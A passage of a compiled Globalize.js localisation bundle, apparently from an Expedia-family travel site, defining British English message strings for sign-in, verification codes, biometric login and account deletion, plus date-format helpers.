+ return function(d) { return "I confirm that I am 18 years old or older, and I have reviewed and agree to the <a href=" + d["0"] + " " + d["1"] + ">Terms of Use</a>, <a href=" + d["2"] + " " + d["3"] + ">Rules & Restrictions</a>, and <a href=" + d["4"] + " " + d["5"] + ">Government Travel Advice</a> (required)."; }
375
+ })(), Globalize("en-GB").pluralGenerator({}));
376
+ Globalize.b745408376 = messageFormatterFn((function( ) {
377
+ return function(d) { return "I consent to the collection and use of my personal information as described in the <a href=" + d["0"] + " " + d["1"] + ">Privacy Policy</a> (required)."; }
378
+ })(), Globalize("en-GB").pluralGenerator({}));
379
+ Globalize.b1379374523 = messageFormatterFn((function( ) {
380
+ return function(d) { return "I consent to the provision of my personal information to third parties, either in Korea or overseas, as described in the <a href=" + d["0"] + " " + d["1"] + ">Privacy Policy</a> (required)."; }
381
+ })(), Globalize("en-GB").pluralGenerator({}));
382
+ Globalize.a2015520386 = messageFormatterFn((function( ) {
383
+ return function(d) { return "Please accept the terms to continue."; }
384
+ })(), Globalize("en-GB").pluralGenerator({}));
385
+ Globalize.a801759219 = messageFormatterFn((function( ) {
386
+ return function(d) { return "Or create an account with " + d["0"]; }
387
+ })(), Globalize("en-GB").pluralGenerator({}));
388
+ Globalize.b1215713801 = messageFormatterFn((function( ) {
389
+ return function(d) { return "Verify your mobile number"; }
390
+ })(), Globalize("en-GB").pluralGenerator({}));
391
+ Globalize.a1806979368 = messageFormatterFn((function( ) {
392
+ return function(d) { return "We'll send one-time verification code to your mobile number to make sure your account remains secure."; }
393
+ })(), Globalize("en-GB").pluralGenerator({}));
394
+ Globalize.b1623748161 = messageFormatterFn((function( ) {
395
+ return function(d) { return "Send"; }
396
+ })(), Globalize("en-GB").pluralGenerator({}));
397
+ Globalize.a40238184 = messageFormatterFn((function( ) {
398
+ return function(d) { return "© " + d["1"] + " " + d["0"] + " All rights reserved."; }
399
+ })(), Globalize("en-GB").pluralGenerator({}));
400
+ Globalize.b1439144010 = messageFormatterFn((function( ) {
401
+ return function(d) { return "Terms and Conditions"; }
402
+ })(), Globalize("en-GB").pluralGenerator({}));
403
+ Globalize.a629061751 = messageFormatterFn((function( ) {
404
+ return function(d) { return "Privacy Policy"; }
405
+ })(), Globalize("en-GB").pluralGenerator({}));
406
+ Globalize.a443645874 = messageFormatterFn((function( ) {
407
+ return function(d) { return "Text me"; }
408
+ })(), Globalize("en-GB").pluralGenerator({}));
409
+ Globalize.a250195875 = messageFormatterFn((function( ) {
410
+ return function(d) { return "Enter verification code"; }
411
+ })(), Globalize("en-GB").pluralGenerator({}));
412
+ Globalize.a845175509 = messageFormatterFn((function( ) {
413
+ return function(d) { return "Verification code"; }
414
+ })(), Globalize("en-GB").pluralGenerator({}));
415
+ Globalize.b970031288 = messageFormatterFn((function( ) {
416
+ return function(d) { return "Resend code"; }
417
+ })(), Globalize("en-GB").pluralGenerator({}));
418
+ Globalize.a181397699 = messageFormatterFn((function( ) {
419
+ return function(d) { return "Change mobile number"; }
420
+ })(), Globalize("en-GB").pluralGenerator({}));
421
+ Globalize.a2077018961 = messageFormatterFn((function( ) {
422
+ return function(d) { return "The verification code has been resent."; }
423
+ })(), Globalize("en-GB").pluralGenerator({}));
424
+ Globalize.b1872213482 = messageFormatterFn((function( ) {
425
+ return function(d) { return "Enter the 6-digit verification code we just sent to " + d["0"]; }
426
+ })(), Globalize("en-GB").pluralGenerator({}));
427
+ Globalize.a1634398711 = messageFormatterFn((function( ) {
428
+ return function(d) { return "Checking verification code"; }
429
+ })(), Globalize("en-GB").pluralGenerator({}));
430
+ Globalize.b1368192272 = messageFormatterFn((function( ) {
431
+ return function(d) { return "This code is incorrect. Resend code to try again."; }
432
+ })(), Globalize("en-GB").pluralGenerator({}));
433
+ Globalize.b686876842 = messageFormatterFn((function( ) {
434
+ return function(d) { return "or continue with"; }
435
+ })(), Globalize("en-GB").pluralGenerator({}));
436
+ Globalize.b1443089050 = messageFormatterFn((function( ) {
437
+ return function(d) { return "Save an average of " + d["0"] + "% on thousands of hotels as a member—it’s always free."; }
438
+ })(), Globalize("en-GB").pluralGenerator({}));
439
+ Globalize.a1125375220 = messageFormatterFn((function( ) {
440
+ return function(d) { return "or"; }
441
+ })(), Globalize("en-GB").pluralGenerator({}));
442
+ Globalize.a65801714 = messageFormatterFn((function( ) {
443
+ return function(d) { return "Other ways to sign in"; }
444
+ })(), Globalize("en-GB").pluralGenerator({}));
445
+ Globalize.a66161128 = messageFormatterFn((function( ) {
446
+ return function(d) { return "Other ways to sign up"; }
447
+ })(), Globalize("en-GB").pluralGenerator({}));
448
+ Globalize.a1832124642 = messageFormatterFn((function( ) {
449
+ return function(d) { return "Sign up with Google"; }
450
+ })(), Globalize("en-GB").pluralGenerator({}));
451
+ Globalize.b4839487 = messageFormatterFn((function( ) {
452
+ return function(d) { return "Sign in was not successful. Please try again or create an account on this site to proceed."; }
453
+ })(), Globalize("en-GB").pluralGenerator({}));
454
+ Globalize.b946555077 = messageFormatterFn((function( ) {
455
+ return function(d) { return "Signing in via phone number is not available. Make sure your social account is set to share your email."; }
456
+ })(), Globalize("en-GB").pluralGenerator({}));
457
+ Globalize.b288027085 = messageFormatterFn((function( ) {
458
+ return function(d) { return "Save " + d["0"] + "% or more on thousands of hotels as a member—it’s always free."; }
459
+ })(), Globalize("en-GB").pluralGenerator({}));
460
+ Globalize.b501621480 = messageFormatterFn((function( ) {
461
+ return function(d) { return "Sign in with Google"; }
462
+ })(), Globalize("en-GB").pluralGenerator({}));
463
+ Globalize.b1577780169 = messageFormatterFn((function( ) {
464
+ return function(d) { return "You have exceeded the maximum number of sign in attempts. Please try again later."; }
465
+ })(), Globalize("en-GB").pluralGenerator({}));
466
+ Globalize.b1053097846 = messageFormatterFn((function( ) {
467
+ return function(d) { return "Sign in using your biometrics"; }
468
+ })(), Globalize("en-GB").pluralGenerator({}));
469
+ Globalize.a544493910 = messageFormatterFn((function( ) {
470
+ return function(d) { return "Use biometrics to access your account, so you won’t need to type your password."; }
471
+ })(), Globalize("en-GB").pluralGenerator({}));
472
+ Globalize.b1737778365 = messageFormatterFn((function( ) {
473
+ return function(d) { return "Get started"; }
474
+ })(), Globalize("en-GB").pluralGenerator({}));
475
+ Globalize.a377629453 = messageFormatterFn((function( ) {
476
+ return function(d) { return "Remind later"; }
477
+ })(), Globalize("en-GB").pluralGenerator({}));
478
+ Globalize.b664613923 = messageFormatterFn((function( ) {
479
+ return function(d) { return "Success!"; }
480
+ })(), Globalize("en-GB").pluralGenerator({}));
481
+ Globalize.b1152308227 = messageFormatterFn((function( ) {
482
+ return function(d) { return "Biometric sign in has been enabled."; }
483
+ })(), Globalize("en-GB").pluralGenerator({}));
484
+ Globalize.b465009819 = messageFormatterFn((function( ) {
485
+ return function(d) { return "Sign in using biometrics"; }
486
+ })(), Globalize("en-GB").pluralGenerator({}));
487
+ Globalize.a11881194 = messageFormatterFn((function( ) {
488
+ return function(d) { return "Use password"; }
489
+ })(), Globalize("en-GB").pluralGenerator({}));
490
+ Globalize.b85008341 = messageFormatterFn((function( ) {
491
+ return function(d) { return "Use biometric"; }
492
+ })(), Globalize("en-GB").pluralGenerator({}));
493
+ Globalize.b2102225604 = messageFormatterFn((function( ) {
494
+ return function(d) { return "Update your password to continue"; }
495
+ })(), Globalize("en-GB").pluralGenerator({}));
496
+ Globalize.b938242112 = messageFormatterFn((function( ) {
497
+ return function(d) { return "In order to access your account, a password reset is required."; }
498
+ })(), Globalize("en-GB").pluralGenerator({}));
499
+ Globalize.b592192310 = messageFormatterFn((function( ) {
500
+ return function(d) { return "Reset password"; }
501
+ })(), Globalize("en-GB").pluralGenerator({}));
502
+ Globalize.b2011113482 = messageFormatterFn((function( ) {
503
+ return function(d) { return "Welcome to member perks"; }
504
+ })(), Globalize("en-GB").pluralGenerator({}));
505
+ Globalize.b1125034340 = messageFormatterFn((function( ) {
506
+ return function(d) { return "Start your next adventure with a gift from us of $" + d["0"] + " in points!"; }
507
+ })(), Globalize("en-GB").pluralGenerator({}));
508
+ Globalize.b93092332 = messageFormatterFn((function( ) {
509
+ return function(d) { return "They are immediately available to view in your account and use on your first booking, just look for the option to apply your points at checkout."; }
510
+ })(), Globalize("en-GB").pluralGenerator({}));
511
+ Globalize.b2020071486 = messageFormatterFn((function( ) {
512
+ return function(d) { return "You're now an Expedia member."; }
513
+ })(), Globalize("en-GB").pluralGenerator({}));
514
+ Globalize.b2069440082 = messageFormatterFn((function( ) {
515
+ return function(d) { return "Start saving with Member Prices instantly and earn points when you book."; }
516
+ })(), Globalize("en-GB").pluralGenerator({}));
517
+ Globalize.a2056722595 = messageFormatterFn((function( ) {
518
+ return function(d) { return "Sign in or create an account"; }
519
+ })(), Globalize("en-GB").pluralGenerator({}));
520
+ Globalize.b1927152809 = messageFormatterFn((function( ) {
521
+ return function(d) { return "Save an average of " + d["0"] + "% on thousands of hotels as a member—it’s always free."; }
522
+ })(), Globalize("en-GB").pluralGenerator({}));
523
+ Globalize.a1413581579 = messageFormatterFn((function( ) {
524
+ return function(d) { return "By continuing, you have read and agree to the <a href=" + d["0"] + " " + d["1"] + ">" + d["2"] + " Terms and Conditions</a>, <a href=" + d["3"] + " " + d["4"] + ">Privacy Statement</a>, and <a href=" + d["4"] + " " + d["5"] + ">" + d["6"] + " Terms & Conditions</a>."; }
525
+ })(), Globalize("en-GB").pluralGenerator({}));
526
+ Globalize.a1632384274 = messageFormatterFn((function( ) {
527
+ return function(d) { return "Email"; }
528
+ })(), Globalize("en-GB").pluralGenerator({}));
529
+ Globalize.a2088069324 = messageFormatterFn((function( ) {
530
+ return function(d) { return "Enter a valid email"; }
531
+ })(), Globalize("en-GB").pluralGenerator({}));
532
+ Globalize.a79996239 = messageFormatterFn((function( ) {
533
+ return function(d) { return "Google"; }
534
+ })(), Globalize("en-GB").pluralGenerator({}));
535
+ Globalize.a2104371164 = messageFormatterFn((function( ) {
536
+ return function(d) { return "Facebook"; }
537
+ })(), Globalize("en-GB").pluralGenerator({}));
538
+ Globalize.a249144602 = messageFormatterFn((function( ) {
539
+ return function(d) { return "Apple"; }
540
+ })(), Globalize("en-GB").pluralGenerator({}));
541
+ Globalize.a1460509517 = messageFormatterFn((function( ) {
542
+ return function(d) { return "This is for personal devices only. Don’t check this on shared devices to keep your account secure."; }
543
+ })(), Globalize("en-GB").pluralGenerator({}));
544
+ Globalize.a807838881 = messageFormatterFn((function( ) {
545
+ return function(d) { return "Confirm your account"; }
546
+ })(), Globalize("en-GB").pluralGenerator({}));
547
+ Globalize.b120191335 = messageFormatterFn((function( ) {
548
+ return function(d) { return "Enter the secure code we sent to your email. Check junk if it’s not in your inbox."; }
549
+ })(), Globalize("en-GB").pluralGenerator({}));
550
+ Globalize.a35509471 = messageFormatterFn((function( ) {
551
+ return function(d) { return "6-digit code"; }
552
+ })(), Globalize("en-GB").pluralGenerator({}));
553
+ Globalize.b101940001 = messageFormatterFn((function( ) {
554
+ return function(d) { return "Resend code"; }
555
+ })(), Globalize("en-GB").pluralGenerator({}));
556
+ Globalize.b56556554 = messageFormatterFn((function( ) {
557
+ return function(d) { return "(0:" + d["0"] + ")"; }
558
+ })(), Globalize("en-GB").pluralGenerator({}));
559
+ Globalize.a2026778018 = messageFormatterFn((function( ) {
560
+ return function(d) { return "Resend code in " + d["0"] + "s"; }
561
+ })(), Globalize("en-GB").pluralGenerator({}));
562
+ Globalize.b1307315805 = messageFormatterFn((function( ) {
563
+ return function(d) { return "We sent a new 6-digit code to your inbox."; }
564
+ })(), Globalize("en-GB").pluralGenerator({}));
565
+ Globalize.b1402475730 = messageFormatterFn((function( ) {
566
+ return function(d) { return "Enter password instead"; }
567
+ })(), Globalize("en-GB").pluralGenerator({}));
568
+ Globalize.b2036868525 = messageFormatterFn((function( ) {
569
+ return function(d) { return "Invalid code, please try again"; }
570
+ })(), Globalize("en-GB").pluralGenerator({}));
571
+ Globalize.a1149600129 = messageFormatterFn((function( ) {
572
+ return function(d) { return "Code expired, please resend and try again"; }
573
+ })(), Globalize("en-GB").pluralGenerator({}));
574
+ Globalize.a943579 = messageFormatterFn((function( ) {
575
+ return function(d) { return "Enter your password"; }
576
+ })(), Globalize("en-GB").pluralGenerator({}));
577
+ Globalize.b2101952236 = messageFormatterFn((function( ) {
578
+ return function(d) { return "Send a secure code via email"; }
579
+ })(), Globalize("en-GB").pluralGenerator({}));
580
+ Globalize.b809537844 = messageFormatterFn((function( ) {
581
+ return function(d) { return "Email and password do not match"; }
582
+ })(), Globalize("en-GB").pluralGenerator({}));
583
+ Globalize.a583641402 = messageFormatterFn((function( ) {
584
+ return function(d) { return "Add password"; }
585
+ })(), Globalize("en-GB").pluralGenerator({}));
586
+ Globalize.a166216868 = messageFormatterFn((function( ) {
587
+ return function(d) { return "Want to add a password?"; }
588
+ })(), Globalize("en-GB").pluralGenerator({}));
589
+ Globalize.b2077113418 = messageFormatterFn((function( ) {
590
+ return function(d) { return "A password isn’t required, but you can add one if you prefer it to our other secure sign in methods. "; }
591
+ })(), Globalize("en-GB").pluralGenerator({}));
592
+ Globalize.b1508584022 = messageFormatterFn((function( ) {
593
+ return function(d) { return "Add password"; }
594
+ })(), Globalize("en-GB").pluralGenerator({}));
595
+ Globalize.b1925676573 = messageFormatterFn((function( ) {
596
+ return function(d) { return "Skip"; }
597
+ })(), Globalize("en-GB").pluralGenerator({}));
598
+ Globalize.a699740518 = messageFormatterFn((function( ) {
599
+ return function(d) { return "Forgot password"; }
600
+ })(), Globalize("en-GB").pluralGenerator({}));
601
+ Globalize.a746948532 = messageFormatterFn((function( ) {
602
+ return function(d) { return "Enter your email, and we'll send you a secure code to sign in."; }
603
+ })(), Globalize("en-GB").pluralGenerator({}));
604
+ Globalize.a301574380 = messageFormatterFn((function( ) {
605
+ return function(d) { return "Send email"; }
606
+ })(), Globalize("en-GB").pluralGenerator({}));
607
+ Globalize.a540957264 = messageFormatterFn((function( ) {
608
+ return function(d) { return "Please wait as we check your account."; }
609
+ })(), Globalize("en-GB").pluralGenerator({}));
610
+ Globalize.b580857105 = messageFormatterFn((function( ) {
611
+ return function(d) { return "Delete account"; }
612
+ })(), Globalize("en-GB").pluralGenerator({}));
613
+ Globalize.a1268746835 = messageFormatterFn((function( ) {
614
+ return function(d) { return "Got it"; }
615
+ })(), Globalize("en-GB").pluralGenerator({}));
616
+ Globalize.a217097617 = messageFormatterFn((function( ) {
617
+ return function(d) { return "Sorry, you can't delete till your trip is complete."; }
618
+ })(), Globalize("en-GB").pluralGenerator({}));
619
+ Globalize.b92439566 = messageFormatterFn((function( ) {
620
+ return function(d) { return "To ensure a smooth trip, you'll need the account to access your booking and get help from our customer care in case of last-minute changes."; }
621
+ })(), Globalize("en-GB").pluralGenerator({}));
622
+ Globalize.b839153183 = messageFormatterFn((function( ) {
623
+ return function(d) { return "Sorry, you'll first need to delete your Vrbo owner account"; }
624
+ })(), Globalize("en-GB").pluralGenerator({}));
625
+ Globalize.b417860810 = messageFormatterFn((function( ) {
626
+ return function(d) { return "Please visit our Help centre on the website or the app to contact our customer care directly to start the process."; }
627
+ })(), Globalize("en-GB").pluralGenerator({}));
628
+ Globalize.a671280230 = messageFormatterFn((function( ) {
629
+ return function(d) { return "Please try again after your trip is over."; }
630
+ })(), Globalize("en-GB").pluralGenerator({}));
631
+ Globalize.a426588291 = messageFormatterFn((function( ) {
632
+ return function(d) { return "Tell us why you're leaving"; }
633
+ })(), Globalize("en-GB").pluralGenerator({}));
634
+ Globalize.b1565696596 = messageFormatterFn((function( ) {
635
+ return function(d) { return "I get too many emails or notifications."; }
636
+ })(), Globalize("en-GB").pluralGenerator({}));
637
+ Globalize.b2133158590 = messageFormatterFn((function( ) {
638
+ return function(d) { return "I have another " + d["0"] + " account."; }
639
+ })(), Globalize("en-GB").pluralGenerator({}));
640
+ Globalize.b368796419 = messageFormatterFn((function( ) {
641
+ return function(d) { return "My trip is over, so I don't need this account."; }
642
+ })(), Globalize("en-GB").pluralGenerator({}));
643
+ Globalize.b1316345597 = messageFormatterFn((function( ) {
644
+ return function(d) { return "I had a negative experience booking with " + d["0"] + "."; }
645
+ })(), Globalize("en-GB").pluralGenerator({}));
646
+ Globalize.b487892740 = messageFormatterFn((function( ) {
647
+ return function(d) { return "Other"; }
648
+ })(), Globalize("en-GB").pluralGenerator({}));
649
+ Globalize.b176854975 = messageFormatterFn((function( ) {
650
+ return function(d) { return "Skip"; }
651
+ })(), Globalize("en-GB").pluralGenerator({}));
652
+ Globalize.b223241080 = messageFormatterFn((function( ) {
653
+ return function(d) { return "Submit"; }
654
+ })(), Globalize("en-GB").pluralGenerator({}));
655
+ Globalize.b2007948648 = messageFormatterFn((function( ) {
656
+ return function(d) { return "We're sorry to see you go. Here are some details you should know:"; }
657
+ })(), Globalize("en-GB").pluralGenerator({}));
658
+ Globalize.a1151468021 = messageFormatterFn((function( ) {
659
+ return function(d) { return "You will lose " + d["0"] + " Expedia Rewards points worth " + d["1"] + ", credits worth " + d["2"] + ", coupons, saved trip items and account preferences forever."; }
660
+ })(), Globalize("en-GB").pluralGenerator({}));
661
+ Globalize.a1044888604 = messageFormatterFn((function( ) {
662
+ return function(d) { return "You will lose " + d["0"] + " Expedia Rewards points worth " + d["1"] + ", coupons, saved trip items and account preferences forever."; }
663
+ })(), Globalize("en-GB").pluralGenerator({}));
664
+ Globalize.a1510157086 = messageFormatterFn((function( ) {
665
+ return function(d) { return "You will lose your trip boards, credits, and preferences forever."; }
666
+ })(), Globalize("en-GB").pluralGenerator({}));
667
+ Globalize.b1221722028 = messageFormatterFn((function( ) {
668
+ return function(d) { return "Hotels.com Rewards: You will lose " + d["0"] + " reward nights worth " + d["1"] + " and " + d["2"] + " stamps at an average value of " + d["3"] + "."; }
669
+ })(), Globalize("en-GB").pluralGenerator({}));
670
+ Globalize.b252501875 = messageFormatterFn((function( ) {
671
+ return function(d) { return "You will lose " + d["0"] + " CheapCash worth " + d["1"] + ", credits worth " + d["2"] + ", coupons, saved trip items and account preferences forever."; }
672
+ })(), Globalize("en-GB").pluralGenerator({}));
673
+ Globalize.b936243580 = messageFormatterFn((function( ) {
674
+ return function(d) { return "You will lose " + d["0"] + " CheapCash worth " + d["1"] + ", coupons, saved trip items and account preferences forever."; }
675
+ })(), Globalize("en-GB").pluralGenerator({}));
676
+ Globalize.a244173893 = messageFormatterFn((function( ) {
677
+ return function(d) { return "You will lose " + d["0"] + " Orbucks worth " + d["1"] + ", credits worth " + d["2"] + ", coupons, saved trip items and account preferences forever."; }
678
+ })(), Globalize("en-GB").pluralGenerator({}));
679
+ Globalize.a930963404 = messageFormatterFn((function( ) {
680
+ return function(d) { return "You will lose " + d["0"] + " Orbucks worth " + d["1"] + ", coupons, saved trip items and account preferences forever."; }
681
+ })(), Globalize("en-GB").pluralGenerator({}));
682
+ Globalize.a179798197 = messageFormatterFn((function( ) {
683
+ return function(d) { return "You will lose " + d["0"] + " MrJet Rewards worth " + d["1"] + ", credits worth " + d["2"] + ", coupons, saved trip items and account preferences forever."; }
684
+ })(), Globalize("en-GB").pluralGenerator({}));
685
+ Globalize.a2108917084 = messageFormatterFn((function( ) {
686
+ return function(d) { return "You will lose " + d["0"] + " MrJet Rewards worth " + d["1"] + ", coupons, saved trip items and account preferences forever."; }
687
+ })(), Globalize("en-GB").pluralGenerator({}));
688
+ Globalize.a1184647213 = messageFormatterFn((function( ) {
689
+ return function(d) { return "You will lose " + d["0"] + " BONUS+ worth " + d["1"] + ", credits worth " + d["2"] + ", coupons, saved trip items and account preferences forever."; }
690
+ })(), Globalize("en-GB").pluralGenerator({}));
691
+ Globalize.a1579279076 = messageFormatterFn((function( ) {
692
+ return function(d) { return "You will lose " + d["0"] + " BONUS+ worth " + d["1"] + ", coupons, saved trip items and account preferences forever."; }
693
+ })(), Globalize("en-GB").pluralGenerator({}));
694
+ Globalize.b1062197577 = messageFormatterFn((function( ) {
695
+ return function(d) { return "You will lose coupons, saved trip items and account preferences forever."; }
696
+ })(), Globalize("en-GB").pluralGenerator({}));
697
+ Globalize.b945462260 = messageFormatterFn((function( ) {
698
+ return function(d) { return "You will lose credits worth " + d["0"] + ", coupons, saved trip items and account preferences forever."; }
699
+ })(), Globalize("en-GB").pluralGenerator({}));
700
+ Globalize.b1262990166 = messageFormatterFn((function( ) {
701
+ return function(d) { return "We may securely keep some information, like records of your transactions, to fulfil legal obligations or in the event that we need to establish, exercise or defend a legal claim. This information will be retained securely and will be deleted, anonymized or permanently obfuscated once it is no longer required."; }
702
+ })(), Globalize("en-GB").pluralGenerator({}));
703
+ Globalize.b416262300 = messageFormatterFn((function( ) {
704
+ return function(d) { return "We hope to see you again"; }
705
+ })(), Globalize("en-GB").pluralGenerator({}));
706
+ Globalize.a1134036229 = messageFormatterFn((function( ) {
707
+ return function(d) { return "Your deletion request may take a few weeks to process, so you may continue receiving communications while our system updates."; }
708
+ })(), Globalize("en-GB").pluralGenerator({}));
709
+ Globalize.b59680438 = dateToPartsFormatterFn({"2":Globalize("en-GB").numberFormatter({"raw":"00"}),"4":Globalize("en-GB").numberFormatter({"raw":"0000"})}, {"pattern":"yyyy-MM-dd","timeSeparator":":"});
710
+ Globalize.b1174226806 = dateToPartsFormatterFn({"2":Globalize("en-GB").numberFormatter({"raw":"00"}),"4":Globalize("en-GB").numberFormatter({"raw":"0000"})}, {"pattern":"dd/MM/yyyy","timeSeparator":":"});
711
+ Globalize.b1374535843 = dateToPartsFormatterFn({"1":Globalize("en-GB").numberFormatter({"raw":"0"}),"4":Globalize("en-GB").numberFormatter({"raw":"0000"})}, {"pattern":"d/M/yyyy","timeSeparator":":"});
712
+ Globalize.a1797977495 = dateToPartsFormatterFn({"1":Globalize("en-GB").numberFormatter({"raw":"0"}),"4":Globalize("en-GB").numberFormatter({"raw":"0000"})}, {"pattern":"yyyy/M/d","timeSeparator":":"});
713
+ Globalize.b1120085782 = dateToPartsFormatterFn({"2":Globalize("en-GB").numberFormatter({"raw":"00"}),"4":Globalize("en-GB").numberFormatter({"raw":"0000"})}, {"pattern":"dd.MM.yyyy","timeSeparator":":"});
714
+ Globalize.a1374134623 = dateToPartsFormatterFn({"1":Globalize("en-GB").numberFormatter({"raw":"0"}),"4":Globalize("en-GB").numberFormatter({"raw":"0000"})}, {"pattern":"d.M.yyyy","timeSeparator":":"});
715
+ Globalize.a677636234 = dateToPartsFormatterFn({"2":Globalize("en-GB").numberFormatter({"raw":"00"}),"4":Globalize("en-GB").numberFormatter({"raw":"0000"})}, {"pattern":"yyyy/MM/dd","timeSeparator":":"});
716
+ Globalize.b1065944758 = dateToPartsFormatterFn({"2":Globalize("en-GB").numberFormatter({"raw":"00"}),"4":Globalize("en-GB").numberFormatter({"raw":"0000"})}, {"pattern":"dd-MM-yyyy","timeSeparator":":"});
717
+ Globalize.b536450486 = dateToPartsFormatterFn({"2":Globalize("en-GB").numberFormatter({"raw":"00"}),"4":Globalize("en-GB").numberFormatter({"raw":"0000"})}, {"pattern":"MM/dd/yyyy","timeSeparator":":"});
718
+ Globalize.b1616107235 = dateToPartsFormatterFn({"1":Globalize("en-GB").numberFormatter({"raw":"0"}),"4":Globalize("en-GB").numberFormatter({"raw":"0000"})}, {"pattern":"M/d/yyyy","timeSeparator":":"});
719
+ Globalize.b1838505750 = dateToPartsFormatterFn({"2":Globalize("en-GB").numberFormatter({"raw":"00"}),"4":Globalize("en-GB").numberFormatter({"raw":"0000"})}, {"pattern":"yyyy.MM.dd","timeSeparator":":"});
720
+ Globalize.b146100011 = dateToPartsFormatterFn({}, {"pattern":"EEEEE","timeSeparator":":","days":{"E":{"5":{"sun":"S","mon":"M","tue":"T","wed":"W","thu":"T","fri":"F","sat":"S"}}}});
721
+ Globalize.b1528764406 = dateToPartsFormatterFn({}, {"pattern":"EEEE","timeSeparator":":","days":{"E":{"4":{"sun":"Sunday","mon":"Monday","tue":"Tuesday","wed":"Wednesday","thu":"Thursday","fri":"Friday","sat":"Saturday"}}}});
722
+ Globalize.a1512957450 = dateToPartsFormatterFn({}, {"pattern":"MMMM","timeSeparator":":","months":{"M":{"4":{"1":"January","2":"February","3":"March","4":"April","5":"May","6":"June","7":"July","8":"August","9":"September","10":"October","11":"November","12":"December"}}}});
723
+ Globalize.a1487809302 = dateToPartsFormatterFn({"1":Globalize("en-GB").numberFormatter({"raw":"0"})}, {"pattern":"d","timeSeparator":":"});
724
+ Globalize.b332491011 = dateToPartsFormatterFn({"1":Globalize("en-GB").numberFormatter({"raw":"0"}),"2":Globalize("en-GB").numberFormatter({"raw":"00"})}, {"pattern":"M/d/yy","timeSeparator":":"});
725
+ Globalize.a265691812 = dateToPartsFormatterFn({"1":Globalize("en-GB").numberFormatter({"raw":"0"})}, {"pattern":"d MMM","timeSeparator":":","months":{"M":{"3":{"1":"Jan","2":"Feb","3":"Mar","4":"Apr","5":"May","6":"Jun","7":"Jul","8":"Aug","9":"Sep","10":"Oct","11":"Nov","12":"Dec"}}}});
726
+ Globalize.b372849563 = dateToPartsFormatterFn({"1":Globalize("en-GB").numberFormatter({"raw":"0"})}, {"pattern":"d MMMM","timeSeparator":":","months":{"M":{"4":{"1":"January","2":"February","3":"March","4":"April","5":"May","6":"June","7":"July","8":"August","9":"September","10":"October","11":"November","12":"December"}}}});
727
+ Globalize.b911380752 = dateToPartsFormatterFn({"1":Globalize("en-GB").numberFormatter({"raw":"0"})}, {"pattern":"d MMMM y","timeSeparator":":","months":{"M":{"4":{"1":"January","2":"February","3":"March","4":"April","5":"May","6":"June","7":"July","8":"August","9":"September","10":"October","11":"November","12":"December"}}}});
728
+ Globalize.b999291344 = dateToPartsFormatterFn({"1":Globalize("en-GB").numberFormatter({"raw":"0"})}, {"pattern":"MMMM y","timeSeparator":":","months":{"M":{"4":{"1":"January","2":"February","3":"March","4":"April","5":"May","6":"June","7":"July","8":"August","9":"September","10":"October","11":"November","12":"December"}}}});
729
+ Globalize.b998606151 = dateToPartsFormatterFn({"1":Globalize("en-GB").numberFormatter({"raw":"0"})}, {"pattern":"d MMM y","timeSeparator":":","months":{"M":{"3":{"1":"Jan","2":"Feb","3":"Mar","4":"Apr","5":"May","6":"Jun","7":"Jul","8":"Aug","9":"Sep","10":"Oct","11":"Nov","12":"Dec"}}}});
730
+ Globalize.a1669220580 = dateToPartsFormatterFn({"1":Globalize("en-GB").numberFormatter({"raw":"0"})}, {"pattern":"EEEE, d MMM","timeSeparator":":","days":{"E":{"4":{"sun":"Sunday","mon":"Monday","tue":"Tuesday","wed":"Wednesday","thu":"Thursday","fri":"Friday","sat":"Saturday"}}},"months":{"M":{"3":{"1":"Jan","2":"Feb","3":"Mar","4":"Apr","5":"May","6":"Jun","7":"Jul","8":"Aug","9":"Sep","10":"Oct","11":"Nov","12":"Dec"}}}});
731
+ Globalize.b380237731 = dateToPartsFormatterFn({"1":Globalize("en-GB").numberFormatter({"raw":"0"})}, {"pattern":"E, d MMM","timeSeparator":":","days":{"E":{"1":{"sun":"Sun","mon":"Mon","tue":"Tue","wed":"Wed","thu":"Thu","fri":"Fri","sat":"Sat"}}},"months":{"M":{"3":{"1":"Jan","2":"Feb","3":"Mar","4":"Apr","5":"May","6":"Jun","7":"Jul","8":"Aug","9":"Sep","10":"Oct","11":"Nov","12":"Dec"}}}});
732
+ Globalize.a319033313 = dateFormatterFn(Globalize("en-GB").dateToPartsFormatter({"raw":"yyyy-MM-dd"}));
733
+ Globalize.b795513055 = dateFormatterFn(Globalize("en-GB").dateToPartsFormatter({"raw":"dd/MM/yyyy"}));
734
+ Globalize.a440381364 = dateFormatterFn(Globalize("en-GB").dateToPartsFormatter({"raw":"d/M/yyyy"}));
735
+ Globalize.b682072594 = dateFormatterFn(Globalize("en-GB").dateToPartsFormatter({"raw":"yyyy/M/d"}));
736
+ Globalize.b741372031 = dateFormatterFn(Globalize("en-GB").dateToPartsFormatter({"raw":"dd.MM.yyyy"}));
737
+ Globalize.b1105915466 = dateFormatterFn(Globalize("en-GB").dateToPartsFormatter({"raw":"d.M.yyyy"}));
738
+ Globalize.a1056349985 = dateFormatterFn(Globalize("en-GB").dateToPartsFormatter({"raw":"yyyy/MM/dd"}));
739
+ Globalize.b687231007 = dateFormatterFn(Globalize("en-GB").dateToPartsFormatter({"raw":"dd-MM-yyyy"}));
740
+ Globalize.b157736735 = dateFormatterFn(Globalize("en-GB").dateToPartsFormatter({"raw":"MM/dd/yyyy"}));
741
+ Globalize.a198809972 = dateFormatterFn(Globalize("en-GB").dateToPartsFormatter({"raw":"M/d/yyyy"}));
742
+ Globalize.b1459791999 = dateFormatterFn(Globalize("en-GB").dateToPartsFormatter({"raw":"yyyy.MM.dd"}));
743
+ Globalize.b297273378 = dateFormatterFn(Globalize("en-GB").dateToPartsFormatter({"raw":"EEEEE"}));
744
+ Globalize.a1930042337 = dateFormatterFn(Globalize("en-GB").dateToPartsFormatter({"raw":"EEEE"}));
745
+ Globalize.a676796897 = dateFormatterFn(Globalize("en-GB").dateToPartsFormatter({"raw":"MMMM"}));
746
+ Globalize.a2071092895 = dateFormatterFn(Globalize("en-GB").dateToPartsFormatter({"raw":"d"}));
747
+ Globalize.b723898092 = dateFormatterFn(Globalize("en-GB").dateToPartsFormatter({"raw":"M/d/yy"}));
748
+ Globalize.a693550381 = dateFormatterFn(Globalize("en-GB").dateToPartsFormatter({"skeleton":"MMMd"}));
749
+ Globalize.a5864188 = dateFormatterFn(Globalize("en-GB").dateToPartsFormatter({"skeleton":"MMMMd"}));
750
+ Globalize.b2056156359 = dateFormatterFn(Globalize("en-GB").dateToPartsFormatter({"skeleton":"yMMMMd"}));
751
+ Globalize.b620577593 = dateFormatterFn(Globalize("en-GB").dateToPartsFormatter({"skeleton":"yMMMM"}));
752
